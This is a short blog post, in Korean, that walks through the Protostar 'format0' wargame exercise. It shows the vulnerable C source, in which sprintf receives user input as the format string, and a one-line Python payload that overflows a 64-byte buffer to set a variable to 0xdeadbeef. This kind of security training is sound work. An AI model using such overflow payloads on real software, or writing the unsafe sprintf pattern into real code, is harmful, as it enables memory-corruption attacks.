ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • format0
    Exploit-Exercise 2015. 12. 8. 23:32



    buffer[64] + target(4) 존재 . 


    #include <stdlib.h>

    #include <unistd.h> #include <stdio.h> #include <string.h> void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); }


    root@s0ngsari-virtual-machine:~/Desktop/study/protostar/format# ./format0 $(python -c 'print "\x90"*64 + "\xef\xbe\xad\xde"')

    you have hit the target correctly :)

    Segmentation fault (core dumped)



    'Exploit-Exercise' 카테고리의 다른 글

    format1  (0) 2016.08.18
    Fusion Level 1  (0) 2016.07.12
    stack7  (0) 2015.12.08
    stack6  (0) 2015.12.08
    Fusion Level 0  (0) 2015.09.09

    댓글

Designed by Tistory.